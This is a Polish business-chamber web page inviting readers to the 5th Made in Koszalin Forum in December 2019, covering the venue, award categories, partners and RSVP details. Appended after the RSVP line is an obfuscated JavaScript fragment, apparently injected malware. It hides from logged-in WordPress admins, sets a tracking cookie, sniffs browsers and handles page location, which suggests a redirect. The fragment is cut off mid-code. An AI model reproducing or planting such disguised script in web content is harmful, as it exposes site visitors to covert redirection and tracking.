Zaproszenie do udziału w V Forum Made in Koszalin | Północna Izba Gospodarcza w Koszalinie

Już 6 grudnia 2019 serdecznie zapraszamy wszystkich na V Forum Made in Koszalin, które odbędzie się w Koszalińskiej Bibliotece Publicznej, Plac Polonii 1 w Koszalinie.

Ideą Forum MADE IN KOSZALIN jest promowanie patriotyzmu lokalnego, designu oraz firm i wydarzeń, z których Koszalin jest dumny.

W drodze otwartych nominacji w październiku br. mieszkańcy Koszalina zgłaszali nominacje do nagród Laury MADE IN KOSZALIN 2019.

Wpłynęło ich aż 293 w 3 kategoriach: biznes, kultura i design oraz styl życia i inspiracje.

Podczas Forum w dniu 6 grudnia zaprezentowani zostaną finaliści wybrani przez Kapitułę V Forum MADE IN KOSZALIN – wyjątkowe koszalińskie firmy i wydarzenia, a wybitne oraz te, które w najlepszy sposób promują Koszalin nagrodzone zostaną Laurami MADE IN KOSZALIN 2019.

Partnerami wydarzenia są: Park Technologiczny S.A., Koszalińska Izba Przemysłowo-Handlowa, Północna Izba Gospodarcza w Koszalinie, Zachodniopomorski Związek Przedsiębiorców i Pracodawców, Politechnika Koszalińska oraz Wydział Architektury i Wzornictwa.

Serdecznie zapraszamy na V Forum MADE IN KOSZALIN – na prezentacje firm, wydarzeń i osobowości, z których Koszalin jest dumny!

Udział w Forum jest bezpłatny. Potwierdzenia udziału przyjmujemy do 30 listopada na adres mailowy: a.jez@biznes.koszalin.plformularz zgłoszenia do pobrania (.doc) 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m